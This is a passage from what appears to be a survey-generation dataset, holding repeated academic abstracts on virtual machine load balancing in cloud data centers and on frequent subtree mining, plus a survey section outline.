data centers paper_content: It is significant to apply load-balancing strategy to improve the performance and reliability of resource in data centers. One of the challenging scheduling problems in Cloud data centers is to take the allocation and migration of reconfigurable virtual machines (VMs) as well as the integrated features of hosting physical machines (PMs) into consideration. In the reservation model, workload of data centers has fixed process interval characteristics. In general, load-balance scheduling is NP-hard problem as proved in many open literatures. Traditionally, for offline load balance without migration, one of the best approaches is LPT (Longest Process Time first), which is well known to have approximation ratio 4/3. With virtualization, reactive (post) migration of VMs after allocation is one popular way for load balance and traffic consolidation. However, reactive migration has difficulty to reach predefined load balance objectives, and may cause interruption and instability of service and other associated costs. In view of this, we propose a new paradigm-Prepartition: it proactively sets process-time bound for each request on each PM and prepares in advance to migrate VMs to achieve the predefined balance goal. Prepartition can reduce process time by preparing VM migration in advance and therefore reduce instability and achieve better load balance as desired. Trace-driven and synthetic simulation results show that Prepartition has 10%-20% better performance than the well known load balancing algorithms with regard to average CPU utilization, makespan as well as capacity makespan. --- paper_title: Energy Efficient Multi Dimensional Host Load Aware Algorithm for Virtual Machine Placement and Optimization in Cloud Environment paper_content: The effectiveness and elasticity of virtual machine placement has become a main concern in modern cloud computing environment. Mapping the virtual machines to the physical machines cluster is called the VM placement. In this paper we present an efficient hybrid genetic based host load aware algorithm for scheduling and optimization of virtual machines in a cluster of Physical hosts. We used two different techniques, first initial VM packing is done by checking the load of the physical host and the user constraints of the VMs. Second optimization of placed VMs is done by using a hybrid genetic algorithm based on fitness function. The presented algorithm is implemented in JAVA Net beans IDE, and Clouds simulator has been used for simulation to assess the execution and performance of our heuristics by comparison with algorithms first fit, best fit and round robin. The performance of the proposed algorithm was examined from both users and service provider’s perception. The simulation results show that our proposed algorithm uses the less number of physical servers for placing a certain number of VMs which helps to improve the resource utilization rate. The response time of our algorithm is little bit more than the first fit algorithm because of its nature of allocating VMs is based on the user constraints and past usage history of the VMs. Elevated SLA satisfaction rate and inferior load imbalance rate was observed in results. Since we used a modified version of hybrid genetic algorithm for load optimization the percentage of VM migrations had been decreased through which we can achieve the better results for load balancing along with cost reduction. The results also show that our hybrid genetic based multi dimensional host load aware and user constraints based algorithm is applicable, valuable and reliable for implementation in real data center environments. --- paper_title: Prepartition: A new paradigm for the load balance of virtual machine reservations in data centers paper_content: It is significant to apply load-balancing strategy to improve the performance and reliability of resource in data centers. One of the challenging scheduling problems in Cloud data centers is to take the allocation and migration of reconfigurable virtual machines (VMs) as well as the integrated features of hosting physical machines (PMs) into consideration. In the reservation model, workload of data centers has fixed process interval characteristics. In general, load-balance scheduling is NP-hard problem as proved in many open literatures. Traditionally, for offline load balance without migration, one of the best approaches is LPT (Longest Process Time first), which is well known to have approximation ratio 4/3. With virtualization, reactive (post) migration of VMs after allocation is one popular way for load balance and traffic consolidation. However, reactive migration has difficulty to reach predefined load balance objectives, and may cause interruption and instability of service and other associated costs. In view of this, we propose a new paradigm-Prepartition: it proactively sets process-time bound for each request on each PM and prepares in advance to migrate VMs to achieve the predefined balance goal. Prepartition can reduce process time by preparing VM migration in advance and therefore reduce instability and achieve better load balance as desired. Trace-driven and synthetic simulation results show that Prepartition has 10%-20% better performance than the well known load balancing algorithms with regard to average CPU utilization, makespan as well as capacity makespan. --- paper_title: Virtual machine mapping policy based on load balancing in private cloud environment paper_content: The virtual machine allocation problem is the key to build a private cloud environment. This paper presents a virtual machine mapping policy based on multi-resource load balancing. It uses the resource consumption of the running virtual machine and the self-adaptive weighted approach, which resolves the load balancing conflicts of each independent resource caused by different demand for resources of cloud applications. Meanwhile, it uses probability approach to ease the problem of load crowding in the concurrent users scene. The experiments and comparative analysis show that this policy achieves the better effect than existing approach. --- paper_title: Energy Efficient Multi Dimensional Host Load Aware Algorithm for Virtual Machine Placement and Optimization in Cloud Environment paper_content: The effectiveness and elasticity of virtual machine placement has become a main concern in modern cloud computing environment. Mapping the virtual machines to the physical machines cluster is called the VM placement. In this paper we present an efficient hybrid genetic based host load aware algorithm for scheduling and optimization of virtual machines in a cluster of Physical hosts. We used two different techniques, first initial VM packing is done by checking the load of the physical host and the user constraints of the VMs. Second optimization of placed VMs is done by using a hybrid genetic algorithm based on fitness function. The presented algorithm is implemented in JAVA Net beans IDE, and Clouds simulator has been used for simulation to assess the execution and performance of our heuristics by comparison with algorithms first fit, best fit and round robin. The performance of the proposed algorithm was examined from both users and service provider’s perception. The simulation results show that our proposed algorithm uses the less number of physical servers for placing a certain number of VMs which helps to improve the resource utilization rate. The response time of our algorithm is little bit more than the first fit algorithm because of its nature of allocating VMs is based on the user constraints and past usage history of the VMs. Elevated SLA satisfaction rate and inferior load imbalance rate was observed in results. Since we used a modified version of hybrid genetic algorithm for load optimization the percentage of VM migrations had been decreased through which we can achieve the better results for load balancing along with cost reduction. The results also show that our hybrid genetic based multi dimensional host load aware and user constraints based algorithm is applicable, valuable and reliable for implementation in real data center environments. --- paper_title: A Scheduling Strategy on Load Balancing of Virtual Machine Resources in Cloud Computing Environment paper_content: The current virtual machine(VM) resources scheduling in cloud computing environment mainly considers the current state of the system but seldom considers system variation and historical data, which always leads to load imbalance of the system. In view of the load balancing problem in VM resources scheduling, this paper presents a scheduling strategy on load balancing of VM resources based on genetic algorithm. According to historical data and current state of the system and through genetic algorithm, this strategy computes ahead the influence it will have on the system after the deployment of the needed VM resources and then chooses the least-affective solution, through which it achieves the best load balancing and reduces or avoids dynamic migration. This strategy solves the problem of load imbalance and high migration cost by traditional algorithms after scheduling. Experimental results prove that this method is able to realize load balancing and reasonable resources utilization both when system load is stable and variant. --- paper_title: Cloud brokering mechanisms for optimized placement of virtual machines across multiple providers paper_content: In the past few years, we have witnessed the proliferation of a heterogeneous ecosystem of cloud providers, each one with a different infrastructure offer and pricing policy. We explore this heterogeneity in a novel cloud brokering approach that optimizes placement of virtual infrastructures across multiple clouds and also abstracts the deployment and management of infrastructure components in these clouds. The feasibility of our approach is evaluated in a high throughput computing cluster case study. Experimental results confirm that multi-cloud deployment provides better performance and lower costs compared to the usage of a single cloud only. --- paper_title: A hybrid meta-heuristic algorithm for VM scheduling with load balancing in cloud computing paper_content: Virtual machine (VM) scheduling with load balancing in cloud computing aims to assign VMs to suitable servers and balance the resource usage among all of the servers. In an infrastructure-as-a-service framework, there will be dynamic input requests, where the system is in charge of creating VMs without considering what types of tasks run on them. Therefore, scheduling that focuses only on fixed task sets or that requires detailed task information is not suitable for this system. This paper combines ant colony optimization and particle swarm optimization to solve the VM scheduling problem, with the result being known as ant colony optimization with particle swarm (ACOPS). ACOPS uses historical information to predict the workload of new input requests to adapt to dynamic environments without additional task information. ACOPS also rejects requests that cannot be satisfied before scheduling to reduce the computing time of the scheduling procedure. Experimental results indicate that the proposed algorithm can keep the load balance in a dynamic environment and outperform other approaches. ---
Title: A Survey on Load Balancing Algorithms for VM Placement in Cloud Computing Section 1: INTRODUCTION Description 1: This section provides an overview of the significance of load balancing in traditional and cloud data centers and outlines the key contributions and structure of the paper. Section 2: Related Work Description 2: This section reviews existing literature and survey papers related to VM load balancing, highlighting their focus areas and limitations. Section 3: Related Technology Description 3: This section introduces essential technologies related to load balancing, including virtualization, VM migration, and VM consolidation. Section 4: Scenario Description 4: This section outlines different scenarios for VM load balancing algorithms, including public, private, and hybrid cloud environments, and discusses constraints and characteristics specific to each scenario. Section 5: VM LOAD BALANCING ALGORITHM MODELING IN CLOUDS Description 5: This section discusses the design considerations for VM load balancing algorithms, including VM resource type, VM type uniformity, allocation dynamicity, optimization strategy, and scheduling process. Section 6: LOAD BALANCING SCHEDULING METRICS COMPARISON Description 6: This section lists and describes various metrics used to evaluate VM load balancing algorithms, such as load variance, makespan, and SLA violations. Section 7: PERFORMANCE EVALUATION APPROACHES Description 7: This section presents different platforms and simulation toolkits used for evaluating the performance of VM load balancing algorithms, providing examples of experimental configurations and results. Section 8: ALGORITHMS COMPARISON Description 8: This section provides detailed descriptions and comparisons of several specific VM load balancing algorithms, highlighting their strengths and weaknesses. Section 9: CHALLENGES AND FUTURE DIRECTIONS Description 9: This section discusses the challenges faced by current VM load balancing algorithms and proposes future research directions to address these challenges.
Frequent tree pattern mining: A survey
9
--- paper_title: Web Mining Research: A Survey paper_content: With the huge amount of information available online, the World Wide Web is a fertile area for data mining research. The Web mining research is at the cross road of research from several research communities, such as database, information retrieval, and within AI, especially the sub-areas of machine learning and natural language processing. However, there is a lot of confusions when comparing research efforts from different point of views. In this paper, we survey the research in the area of Web mining, point out some confusions regarded the usage of the term Web mining and suggest three Web mining categories. Then we situate some of the research with respect to these three categories. We also explore the connection between the Web mining categories and the related agent paradigm. For the survey, we focus on representation issues, on the process, on the learning algorithm, and on the application of the recent works as the criteria. We conclude the paper with some research issues. --- paper_title: Challenges in mining social network data: processes, privacy, and paradoxes paper_content: The profileration of rich social media, on-line communities, and collectively produced knowledge resources has accelerated the convergence of technological and social networks, producing environments that reflect both the architecture of the underlying information systems and the social structure on their members. In studying the consequences of these developments, we are faced with the opportunity to analyze social network data at unprecedented levels of scale and temporal resolution; this has led to a growing body of research at the intersection of the computing and social sciences. We discuss some of the current challenges in the analysis of large-scale social network data, focusing on two themes in particular: the inference of social processes from data, and the problem of maintaining individual privacy in studies of social networks. While early research on this type of data focused on structural questions, recent work has extended this to consider the social processes that unfold within the networks. Particular lines of investigation have focused on processes in on-line social systems related to communication [1, 22], community formation [2, 8, 16, 23], information-seeking and collective problem-solving [20, 21, 18], marketing [12, 19, 24, 28], the spread of news [3, 17], and the dynamics of popularity [29]. There are a number of fundamental issues, however, for which we have relatively little understanding, including the extent to which the outcomes of these types of social processes are predictable from their early stages (see e.g. [29]), the differences between properties of individuals and properties of aggregate populations in these types of data, and the extent to which similar social phenomena in different domains have uniform underlying explanations. The second theme we pursue is concerned with the problem of privacy. While much of the research on large-scale social systems has been carried out on data that is public, some of the richest emerging sources of social interaction data come from settings such as e-mail, instant messaging, or phone communication in which users have strong expectations of privacy. How can such data be made available to researchers while protecting the privacy of the individuals represented in the data? Many of the standard approaches here are variations on the principle of anonymization - the names of individuals are replaced with meaningless unique identifiers, so that the network structure is maintained while private information has been suppressed. In recent joint work with Lars Backstrom and Cynthia Dwork, we have identified some fundamental limitations on the power of network anonymization to ensure privacy [7]. In particular, we describe a family of attacks such that even from a single anonymized copy of a social network, it is possible for an adversary to learn whether edges exist or not between specific targeted pairs of nodes. The attacks are based on the uniqueness of small random subgraphs embedded in an arbitrary network, using ideas related to those found in arguments from Ramsey theory [6, 14]. Combined with other recent examples of privacy breaches in data containing rich textual or time-series information [9, 26, 27, 30], these results suggest that anonymization contains pitfalls even in very simple settings. In this way, our approach can be seen as a step toward understanding how techniques of privacy-preserving data mining (see e.g. [4, 5, 10, 11, 13, 15, 25] and the references therein) can inform how we think about the protection of eventhe most skeletal social network data. --- paper_title: Frequent Subtree Mining - An Overview paper_content: Mining frequent subtrees from databases of labeled trees is a new research field that has many practical applications in areas such as computer networks, Web mining, bioinformatics, XML document mining, etc. These applications share a requirement for the more expressive power of labeled trees to capture the complex relations among data entities. Although frequent subtree mining is a more difficult task than frequent itemset mining, most existing frequent subtree mining algorithms borrow techniques from the relatively mature association rule mining area. This paper provides an overview of a broad range of tree mining algorithms. We focus on the common theoretical foundations of the current frequent subtree mining algorithms and their relationship with their counterparts in frequent itemset mining. When comparing the algorithms, we categorize them according to their problem definitions and the techniques employed for solving various subtasks of the subtree mining problem. In addition, we also present a thorough performance study for a representative family of algorithms. --- paper_title: XRules: an effective structural classifier for XML data paper_content: XML documents have recently become ubiquitous because of their varied applicability in a number of applications. Classification is an important problem in the data mining domain, but current classification methods for XML documents use IR-based methods in which each document is treated as a bag of words. Such techniques ignore a significant amount of information hidden inside the documents. In this paper we discuss the problem of rule based classification of XML data by using frequent discriminatory substructures within XML documents. Such a technique is more capable of finding the classification characteristics of documents. In addition, the technique can also be extended to cost sensitive classification. We show the effectiveness of the method with respect to other classifiers. We note that the methodology discussed in this paper is applicable to any kind of semi-structured data. --- paper_title: Mining molecular fragments: finding relevant substructures of molecules paper_content: We present an algorithm to find fragments in a set of molecules that help to discriminate between different classes of for instance, activity in a drug discovery context. Instead of carrying out a brute-force search, our method generates fragments by embedding them in all appropriate molecules in parallel and prunes the search tree based on a local order of the atoms and bonds, which results in substantially faster search by eliminating the need for frequent, computationally expensive reembeddings and by suppressing redundant search. We prove the usefulness of our algorithm by demonstrating the discovery of activity-related groups of chemical compounds in the well-known National Cancer Institute's HIV-screening dataset. --- paper_title: Xproj: a framework for projected structural clustering of xml documents paper_content: XML has become a popular method of data representation both on the web and in databases in recent years. One of the reasons for the popularity of XML has been its ability to encode structural information about data records. However, this structural characteristic of data sets also makes it a challenging problem for a variety of data mining problems. One such problem is that of clustering, in which the structural aspects of the data result in a high implicit dimensionality of the data representation. As a result, it becomes more difficult to cluster the data in a meaningful way. In this paper, we propose an effective clustering algorithm for XML data which uses substructures of the documents in order to gain insights about the important underlying structures. We propose new ways of using multiple sub-structuralinformation in XML documents to evaluate the quality of intermediate cluster solutions, and guide the algorithms to a final solution which reflects the true structural behavior in individual partitions. We test the algorithm on a variety of real and synthetic data sets. --- paper_title: Frequent Subtree Mining - An Overview paper_content: Mining frequent subtrees from databases of labeled trees is a new research field that has many practical applications in areas such as computer networks, Web mining, bioinformatics, XML document mining, etc. These applications share a requirement for the more expressive power of labeled trees to capture the complex relations among data entities. Although frequent subtree mining is a more difficult task than frequent itemset mining, most existing frequent subtree mining algorithms borrow techniques from the relatively mature association rule mining area. This paper provides an overview of a broad range of tree mining algorithms. We focus on the common theoretical foundations of the current frequent subtree mining algorithms and their relationship with their counterparts in frequent itemset mining. When comparing the algorithms, we categorize them according to their problem definitions and the techniques employed for solving various subtasks of the subtree mining problem. In addition, we also present a thorough performance study for a representative family of algorithms. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. --- paper_title: Frequent Subtree Mining - An Overview paper_content: Mining frequent subtrees from databases of labeled trees is a new research field that has many practical applications in areas such as computer networks, Web mining, bioinformatics, XML document mining, etc. These applications share a requirement for the more expressive power of labeled trees to capture the complex relations among data entities. Although frequent subtree mining is a more difficult task than frequent itemset mining, most existing frequent subtree mining algorithms borrow techniques from the relatively mature association rule mining area. This paper provides an overview of a broad range of tree mining algorithms. We focus on the common theoretical foundations of the current frequent subtree mining algorithms and their relationship with their counterparts in frequent itemset mining. When comparing the algorithms, we categorize them according to their problem definitions and the techniques employed for solving various subtasks of the subtree mining problem. In addition, we also present a thorough performance study for a representative family of algorithms. --- paper_title: To see the wood for the trees: mining frequent tree patterns paper_content: Various definitions and frameworks for discovering frequent trees in forests have been developed recently. At the heart of these frameworks lies the notion of matching, which determines if a pattern tree matches a tree in a data set. We compare four notions of tree matching for use in frequent tree mining and show how they are related to each other. Furthermore, we show how Zaki's TreeMinerV algorithm can be adapted to employ three of the four notions of tree matching. Experiments on synthetic and real world data highlight the differences between the matchings. --- paper_title: Matching in frequent tree discovery paper_content: Various definitions and frameworks for discovering frequent trees in forests have been developed. At the heart of these frameworks lies the notion of matching, which determines when a pattern tree matches a tree in a data set. We introduce a notion of tree matching for use in frequent tree mining and we show that it generalizes the framework of Zaki while still being more specific than that of Termier et al. Furthermore, we show how Zaki's TreeMinerV algorithm can be adapted towards our notion of tree matching. Experiments show the promise of the approach. --- paper_title: Discovering Frequent Agreement Subtrees from Phylogenetic Data paper_content: We study a new data mining problem concerning the discovery of frequent agreement subtrees (FASTs) from a set of phylogenetic trees. A phylogenetic tree, or phylogeny, is an unordered tree in which the order among siblings is unimportant. Furthermore, each leaf in the tree has a label representing a taxon (species or organism) name, whereas internal nodes are unlabeled. The tree may have a root, representing the common ancestor of all species in the tree, or may be unrooted. An unrooted phylogeny arises due to the lack of sufficient evidence to infer a common ancestor of the taxa in the tree. The FAST problem addressed here is a natural extension of the maximum agreement subtree (MAST) problem widely studied in the computational phylogenetics community. The paper establishes a framework for tackling the FAST problem for both rooted and unrooted phylogenetic trees using data mining techniques. We first develop a novel canonical form for rooted trees together with a phylogeny-aware tree expansion scheme for generating candidate subtrees level by level. Then, we present an efficient algorithm to find all FASTs in a given set of rooted trees, through an Apriori-like approach. We show the correctness and completeness of the proposed method. Finally, we discuss the extensions of the techniques to unrooted trees. Experimental results demonstrate that the proposed methods work well, and are capable of finding interesting patterns in both synthetic data and real phylogenetic trees. --- paper_title: Mining frequent patterns without candidate generation paper_content: Mining frequent patterns in transaction databases, time-series databases, and many other kinds of databases has been studied popularly in data mining research. Most of the previous studies adopt an Apriori-like candidate set generation-and-test approach. However, candidate set generation is still costly, especially when there exist prolific patterns and/or long patterns. In this study, we propose a novel frequent pattern tree (FP-tree) structure, which is an extended prefix-tree structure for storing compressed, crucial information about frequent patterns, and develop an efficient FP-tree-based mining method, FP-growth, for mining the complete set of frequent patterns by pattern fragment growth. Efficiency of mining is achieved with three techniques: (1) a large database is compressed into a highly condensed, much smaller data structure, which avoids costly, repeated database scans, (2) our FP-tree-based mining adopts a pattern fragment growth method to avoid the costly generation of a large number of candidate sets, and (3) a partitioning-based, divide-and-conquer method is used to decompose the mining task into a set of smaller tasks for mining confined patterns in conditional databases, which dramatically reduces the search space. Our performance study shows that the FP-growth method is efficient and scalable for mining both long and short frequent patterns, and is about an order of magnitude faster than the Apriori algorithm and also faster than some recently reported new frequent pattern mining methods. --- paper_title: Efficient data mining for maximal frequent subtrees paper_content: A new type of tree mining is defined, which uncovers maximal frequent induced subtrees from a database of unordered labeled trees. A novel algorithm, PathJoin, is proposed. The algorithm uses a compact data structure, FST-Forest, which compresses the trees and still keeps the original tree structure. PathJoin generates candidate subtrees by joining the frequent paths in FST-Forest. Such candidate subtree generation is localized and thus substantially reduces the number of candidate subtrees. Experiments with synthetic data sets show that the algorithm is effective and efficient. --- paper_title: Discovering Frequent Substructures in Large Unordered Trees paper_content: In this paper, we study a frequent substructure discovery problem in semi-structured data. We present an efficient algorithm Unotthat computes all frequent labeled unordered trees appearing in a large collection of data trees with frequency above a user-specified threshold. The keys of the algorithm are efficient enumeration of all unordered trees in canonical form and incremental computation of their occurrences. We then show that Unotdiscovers each frequent pattern T in O(kb 2 m) per pattern, where k is the size of T, b is the branching factor of the data trees, and m is the total number of occurrences of T in the data trees. --- paper_title: MB3 Miner: mining eMBedded sub-TREEs using Tree Model Guided candidate generation paper_content: Tree mining has many useful applications in areas such as Bioinformatics, XML mining, Web mining, etc. In general, most of the formally represented information in these domains is a tree structured form. In this paper we focus on mining frequent embedded subtrees from databases of rooted labeled ordered subtrees. We propose a novel and unique embedding list representation that is suitable for describing embedded subtrees. This representation is completely different from the string-like or conventional adjacency list representation previously utilized for trees. We present the mathematical model of a breadth-first-search Tree Model Guided (TMG) candidate generation approach previously introduced in [8]. The key characteristic of the TMG approach is that it enumerates fewer candidates by ensuring that only valid candidates that conform to the structural aspects of the data are generated as opposed to the join approach. Our experiments with both synthetic and real-life datasets provide comparisons against one of the state-of-the-art algorithms, TreeMiner [15], and they demonstrate the effectiveness and the efficiency of the technique. --- paper_title: IMB3 Miner: Mining Induced/Embedded Subtrees by Constraining the Level of Embedding paper_content: Tree mining has recently attracted a lot of interest in areas such as Bioinformatics, XML mining, Web mining, etc. We are mainly concerned with mining frequent induced and embedded subtrees. While more interesting patterns can be obtained when mining embedded subtrees, unfortunately mining such embedding relationships can be very costly. In this paper, we propose an efficient approach to tackle the complexity of mining embedded subtrees by utilizing a novel Embedding List representation, Tree Model Guided enumeration, and introducing the Level of Embedding constraint. Thus, when it is too costly to mine all frequent embedded subtrees, one can decrease the level of embedding constraint gradually up to 1, from which all the obtained frequent subtrees are induced subtrees. Our experiments with both synthetic and real datasets against two known algorithms for mining induced and embedded subtrees, FREQT and TreeMiner, demonstrate the effectiveness and the efficiency of the technique. --- paper_title: UNI3 - efficient algorithm for mining unordered induced subtrees using TMG candidate generation paper_content: Semi-structured data sources are increasingly in use today because of their capability of representing information through more complex structures where semantics and relationships of data objects are more easily expressed. Extraction of frequent sub-structures from such data has found important applications in areas such as Bioinformatics, XML mining, Web mining, scientific data management etc. This paper is concerned with the task of mining frequent unordered induced subtrees from a database of rooted ordered labeled subtrees. Our previous work in the area of frequent subtree mining is characterized by the efficient tree model guided (TMG) candidate enumeration, where candidate subtrees conform to the data's underlying tree structure. We apply the same approach to the unordered case, motivated by the fact that in many applications of frequent subtree mining the order among siblings is not considered important. The proposed UNI3 algorithm considers both transaction based and occurrence match support. Synthetic and real world data are used to evaluate the time performance of our approach in comparison to the well known algorithms developed for the same problem --- paper_title: Discovering Frequent Substructures in Large Unordered Trees paper_content: In this paper, we study a frequent substructure discovery problem in semi-structured data. We present an efficient algorithm Unotthat computes all frequent labeled unordered trees appearing in a large collection of data trees with frequency above a user-specified threshold. The keys of the algorithm are efficient enumeration of all unordered trees in canonical form and incremental computation of their occurrences. We then show that Unotdiscovers each frequent pattern T in O(kb 2 m) per pattern, where k is the size of T, b is the branching factor of the data trees, and m is the total number of occurrences of T in the data trees. --- paper_title: TRIPS and TIDES: new algorithms for tree mining paper_content: Recent research in data mining has progressed from mining frequent itemsets to more general and structured patterns like trees and graphs. In this paper, we address the problem of frequent subtree mining that has proven to be viable in a wide range of applications such as bioinformatics, XML processing, computational linguistics, and web usage mining. We propose novel algorithms to mine frequent subtrees from a database of rooted trees. We evaluate the use of two popular sequential encodings of trees to systematically generate and evaluate the candidate patterns. The proposed approach is very generic and can be used to mine embedded or induced subtrees that can be labeled, unlabeled, ordered, unordered, or edge-labeled. Our algorithms are highly cache-conscious in nature because of the compact and simple array-based data structures we use. Typically, L1 and L2 hit rates above 99% are observed. Experimental evaluation showed that our algorithms can achieve up to several orders of magnitude speedup on real datasets when compared to state-of-the-art tree mining algorithms. --- paper_title: Frequent Subtree Mining - An Overview paper_content: Mining frequent subtrees from databases of labeled trees is a new research field that has many practical applications in areas such as computer networks, Web mining, bioinformatics, XML document mining, etc. These applications share a requirement for the more expressive power of labeled trees to capture the complex relations among data entities. Although frequent subtree mining is a more difficult task than frequent itemset mining, most existing frequent subtree mining algorithms borrow techniques from the relatively mature association rule mining area. This paper provides an overview of a broad range of tree mining algorithms. We focus on the common theoretical foundations of the current frequent subtree mining algorithms and their relationship with their counterparts in frequent itemset mining. When comparing the algorithms, we categorize them according to their problem definitions and the techniques employed for solving various subtasks of the subtree mining problem. In addition, we also present a thorough performance study for a representative family of algorithms. --- paper_title: A quickstart in frequent structure mining can make a difference paper_content: Given a database, structure mining algorithms search for substructures that satisfy constraints such as minimum frequency, minimum confidence, minimum interest and maximum frequency. Examples of substructures include graphs, trees and paths. For these substructures many mining algorithms have been proposed. In order to make graph mining more efficient, we investigate the use of the "quickstart principle", which is based on the fact that these classes of structures are contained in each other, thus allowing for the development of structure mining algorithms that split the search into steps of increasing complexity. We introduce the GrAph/Sequence/Tree extractiON ( Gaston ) algorithm that implements this idea by searching first for frequent paths, then frequent free trees and finally cyclic graphs. We investigate two alternatives for computing the frequency of structures and present experimental results to relate these alternatives. --- paper_title: Mining Induced and Embedded Subtrees in Ordered, Unordered, and Partially-Ordered Trees paper_content: Many data mining problems can be represented with non-linear data structures like trees. In this paper, we introduce a scalable algorithm to mine partially-ordered trees. Our algorithm, POTMiner, is able to identify both induced and embedded subtrees and, as special cases, it can handle both completely ordered and completely unordered trees (i.e. the particular situations existing algorithms address). --- paper_title: Efficiently mining frequent trees in a forest: algorithms and applications paper_content: Mining frequent trees is very useful in domains like bioinformatics, Web mining, mining semistructured data, etc. We formulate the problem of mining (embedded) subtrees in a forest of rooted, labeled, and ordered trees. We present TREEMINER, a novel algorithm to discover all frequent subtrees in a forest, using a new data structure called scope-list. We contrast TREEMINER with a pattern matching tree mining algorithm (PATTERNMATCHER), and we also compare it with TREEMINERD, which counts only distinct occurrences of a pattern. We conduct detailed experiments to test the performance and scalability of these methods. We also use tree mining to analyze RNA structure and phylogenetics data sets from bioinformatics domain. --- paper_title: To see the wood for the trees: mining frequent tree patterns paper_content: Various definitions and frameworks for discovering frequent trees in forests have been developed recently. At the heart of these frameworks lies the notion of matching, which determines if a pattern tree matches a tree in a data set. We compare four notions of tree matching for use in frequent tree mining and show how they are related to each other. Furthermore, we show how Zaki's TreeMinerV algorithm can be adapted to employ three of the four notions of tree matching. Experiments on synthetic and real world data highlight the differences between the matchings. --- paper_title: Efficiently Mining Frequent Embedded Unordered Trees paper_content: Mining frequent trees is very useful in domains like bioinformatics, web mining, mining semi-structured data, and so on. In this paper we introduce SLEUTH, an efficient algorithm for mining frequent, unordered, embedded subtrees in a database of labeled trees. The key contributions of our work are as follows: We give the first algorithm that enumerates all embedded, unordered trees. We propose a new equivalence class extension scheme to generate all candidate trees. We extend the notion of scope-list joins to compute frequency of unordered trees. We conduct performance evaluation on several synthetic and real datasets to show that SLEUTH is an efficient algorithm, which has performance comparable to TreeMiner, that mines only ordered trees. --- paper_title: Efficiently mining frequent trees in a forest paper_content: Mining frequent trees is very useful in domains like bioinformatics, web mining, mining semistructured data, and so on. We formulate the problem of mining (embedded) subtrees in a forest of rooted, labeled, and ordered trees. We present T REE M INER , a novel algorithm to discover all frequent subtrees in a forest, using a new data structure called scope-list. We contrast T REE M INER with a pattern matching tree mining algorithm (P ATTERN M ATCHER ). We conduct detailed experiments to test the performance and scalability of these methods. We find that T REE M INER outperforms the pattern matching approach by a factor of 4 to 20, and has good scaleup properties. We also present an application of tree mining to analyze real web logs for usage patterns. --- paper_title: Discovering Frequent Agreement Subtrees from Phylogenetic Data paper_content: We study a new data mining problem concerning the discovery of frequent agreement subtrees (FASTs) from a set of phylogenetic trees. A phylogenetic tree, or phylogeny, is an unordered tree in which the order among siblings is unimportant. Furthermore, each leaf in the tree has a label representing a taxon (species or organism) name, whereas internal nodes are unlabeled. The tree may have a root, representing the common ancestor of all species in the tree, or may be unrooted. An unrooted phylogeny arises due to the lack of sufficient evidence to infer a common ancestor of the taxa in the tree. The FAST problem addressed here is a natural extension of the maximum agreement subtree (MAST) problem widely studied in the computational phylogenetics community. The paper establishes a framework for tackling the FAST problem for both rooted and unrooted phylogenetic trees using data mining techniques. We first develop a novel canonical form for rooted trees together with a phylogeny-aware tree expansion scheme for generating candidate subtrees level by level. Then, we present an efficient algorithm to find all FASTs in a given set of rooted trees, through an Apriori-like approach. We show the correctness and completeness of the proposed method. Finally, we discuss the extensions of the techniques to unrooted trees. Experimental results demonstrate that the proposed methods work well, and are capable of finding interesting patterns in both synthetic data and real phylogenetic trees. --- paper_title: AMIOT: induced ordered tree mining in tree-structured databases paper_content: Frequent subtree mining has become increasingly important in recent years. In this paper, we present AMIOT algorithm to discover all frequent ordered subtrees in a tree-structured database. In order to avoid the generation of infrequent candidate trees, we propose the techniques such as right-and-left tree join and serial tree extension. Proposed methods enumerate only the candidate trees with high probability of being frequent without any duplication. The experiments on synthetic dataset and XML database show that AMIOT reduces redundant candidate trees and outperforms FREQT algorithm by up to five times in execution time. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. --- paper_title: Efficiently mining frequent trees in a forest: algorithms and applications paper_content: Mining frequent trees is very useful in domains like bioinformatics, Web mining, mining semistructured data, etc. We formulate the problem of mining (embedded) subtrees in a forest of rooted, labeled, and ordered trees. We present TREEMINER, a novel algorithm to discover all frequent subtrees in a forest, using a new data structure called scope-list. We contrast TREEMINER with a pattern matching tree mining algorithm (PATTERNMATCHER), and we also compare it with TREEMINERD, which counts only distinct occurrences of a pattern. We conduct detailed experiments to test the performance and scalability of these methods. We also use tree mining to analyze RNA structure and phylogenetics data sets from bioinformatics domain. --- paper_title: MB3 Miner: mining eMBedded sub-TREEs using Tree Model Guided candidate generation paper_content: Tree mining has many useful applications in areas such as Bioinformatics, XML 